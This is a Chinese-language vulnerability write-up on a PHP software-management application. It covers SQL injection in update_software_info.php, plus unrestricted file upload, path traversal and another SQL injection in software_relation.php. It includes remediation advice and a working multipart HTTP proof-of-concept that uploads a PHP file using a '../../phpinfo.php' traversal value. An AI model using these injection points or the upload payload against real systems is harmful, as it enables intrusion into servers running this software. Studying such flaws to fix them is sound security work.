SQL注入（漏洞文件：inter/update_software_info.php；注入点为 POST 参数 type，其次 key）
<?php require_once "./use_db.php" ;require_once "./common/functions.php" ;$return =array ();$return ["nResult" ] =0 ;$where ='where 1=1' ;if (!is_null ($_POST ['type' ]) and $_POST ['type' ] !="" ) { $id =$_POST ['type' ]; $where .=" and type=$id " ; } if (!is_null ($_POST ['key' ])) { $keyname =$_POST ['key' ]; $where .=" and keyname like '%" .$keyname ."%' " ; } $sql ="select sc_software_items.id ,version,packagesize,keyname,packagename,photoname,descri,type,param ,ty.type_name as type_name from sc_software_items left join type_software ty on ty.type_id = sc_software_items.type {$where} group by id" ;$type ='select * from type_software' ;try { $return ["software_list" ]=array (); $return ["typeList" ]=array (); $result = $mysqlDB ->query ($sql ); $res = $mysqlDB ->query ($type );
注入点：POST 参数 type（另有 key）。代码中 `$where .= " and type=$id "` 把 type 未经任何过滤、转义或参数化直接拼进 WHERE 子句，而且没有引号包裹，随后由 `$mysqlDB->query($sql)` 直接执行，因此可进行报错注入、布尔/时间盲注等。`key` 参数同样被拼进 `keyname like '%...%'`，只需先闭合单引号即可注入，是第二个注入点。另外 `!is_null($_POST['type'])` 在参数缺失时会产生未定义索引告警，应改用 isset。修复：改为预处理语句（prepared statement），并将 type 强制转换为整数、key 作为绑定参数传入。作者称可进一步获得 os-shell（如 sqlmap --os-shell），但这取决于数据库账户是否具有 FILE 权限、secure_file_priv 的设置以及 Web 目录是否可写，本文未给出验证过程，需在目标环境中确认。
任意文件上传（漏洞文件：inter/software_relation.php；上传参数为 multipart 字段 toolImage）
<?php set_time_limit (0 ); date_default_timezone_set ("Asia/Shanghai" ); require_once "./use_db.php" ; session_start (); $id =$_POST ["id" ]; $toolNames =$_POST ["toolName" ]; $toolFileName =$_POST ["toolFileName" ]; $toolDescri =$_POST ["toolDescri" ]; $version =$_POST ["version" ]; $size =$_POST ['fileSize' ]; $arr_softwarekey =$_POST ['seilist' ]; $type = $_POST ['sofe_typeof' ]; $param = isset ($_POST ['param' ]) ?$_POST ['param' ] : "" ; $update_time =time (); function iconvCharset ($fields ) { $out_string = "GBK" ; $out_string .= "//IGNORE" ; if (PHP_OS == 'Linux' ) { return iconv ("UTF-8" ,"GBK//IGNORE" , $fields ); }else { return iconv ("UTF-8" ,$out_string ,$fields ); } } $gb2312_filename = $toolFileName ; $file_path = "../softmanagement/files/{$toolFileName} " ; $file_path_ = "../softmanagement/files/{$gb2312_filename} " ; $_SESSION ['name' ]=$toolFileName ; $_SESSION ['time' ]=time (); $_SESSION ['version' ]=$version ; $toolFileName =$version .'.' .$gb2312_filename ; @mkdir ("../softmanagement/download" ); $download_file = "../softmanagement/download/" ; $file_name =$download_file .$toolFileName ; $photo_name =$download_file .iconv ("UTF-8" , "GB2312" ,$_FILES ['toolImage' ]['name' ]); $sql_type ="select type_name from type_software where type_id='$type ' " ; $type_res =$mysqlDB ->query ($sql_type ); foreach ($type_res as $value ) { $type_name =$value ['type_name' ]; } try { $file_name = iconvCharset ($file_name ); $file_path = iconvCharset ($file_path ); if ($id =='' or $id ==null or $id ==0 or !isset ($_POST ["id" ])) { if (copy ($file_path ,$file_name ) || copy ($file_path_ , $file_name )) { $photo_file ='default.png' ; if ($_FILES ['toolImage' ]['tmp_name' ] != '' ){ if (move_uploaded_file ($_FILES ['toolImage' ]['tmp_name' ],$photo_name )) { $photo_file =$_FILES ['toolImage' ]['name' ]; }else { echo json_encode ("move photo file failed" ); exit (); } }
上传的图片原始文件名 `$_FILES['toolImage']['name']` 未做任何后缀或 MIME 类型校验，经 iconv 转码后直接拼到 `../softmanagement/download/` 并 `move_uploaded_file`，因此只要 download 目录可通过 Web 访问，就能直接写入并执行 .php 文件。需要注意两点：(1) `move_uploaded_file` 位于 `if (copy($file_path, $file_name) || copy($file_path_, $file_name))` 分支内，只有复制成功才会处理图片，所以 toolFileName 参数必须指向服务器上一个已存在且可读的文件，根目录下有大量现成文件可选；(2) toolFileName 本身也未过滤 `../`，并同时拼入源路径和目标路径，因此还存在路径穿越（PoC 中使用的即是 `../../phpinfo.php`）。此外，同一文件中 `$sql_type = "select type_name from type_software where type_id='$type'"` 把 POST 参数 sofe_typeof 直接拼进 SQL，是另一处注入点；该片段中除 `session_start()` 外未见任何鉴权检查，是否需要登录需结合其它代码确认。修复建议：对上传文件按白名单后缀校验并服务端重命名；对 toolFileName 取 basename 并用 realpath 限定在 files 目录内；SQL 改为预处理语句。
POST /inter/software_relation.php HTTP/1.1 Host: 192.168.86.128:6868 User-Agent: insomnia/2021.3.0 Cookie: SKYLARa0aede9e785feabae789c6e03d=0dii85n3v7bh0ct4se9jckmee0 Content-Type: multipart/form-data; boundary=X-INSOMNIA-BOUNDARY Accept: */* Content-Length: 594 Connection: close --X-INSOMNIA-BOUNDARY Content-Disposition: form-data; name="toolFileName" ../../phpinfo.php --X-INSOMNIA-BOUNDARY Content-Disposition: form-data; name="toolName" 123.php --X-INSOMNIA-BOUNDARY Content-Disposition: form-data; name="version" 1 --X-INSOMNIA-BOUNDARY Content-Disposition: form-data; name="toolDescri" 1 --X-INSOMNIA-BOUNDARY Content-Disposition: form-data; name="fileSize" 1 --X-INSOMNIA-BOUNDARY Content-Disposition: form-data; name="toolImage"; filename="info.php" Content-Type: application/x-httpd-php <?php phpinfo();?> --X-INSOMNIA-BOUNDARY--